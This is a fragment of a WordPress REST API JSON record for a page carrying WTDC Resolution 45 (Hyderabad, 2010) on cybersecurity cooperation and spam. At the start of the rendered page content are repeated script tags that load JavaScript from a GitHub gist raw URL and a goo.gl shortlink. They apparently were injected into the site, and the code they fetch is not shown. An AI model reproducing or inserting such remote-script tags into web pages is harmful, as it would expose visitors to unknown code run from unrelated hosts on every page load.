src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTDC RESOLUTION 45 (Rev. Hyderabad, 2010) Mechanisms for enhancing cooperation on cybersecurity, including countering and combating spam The World Telecommunication Development Conference (Hyderabad, 2010), recalling a)Resolution 45 (Doha, 2006) of the World Telecommunication Development Conference (WTDC); b)the noble principles, aims and objectives embodied in the Charter of the United Nations and the Universal Declaration of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1486,"menu_order":45,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-488","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/488","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=488"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/488\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1486"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=488"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}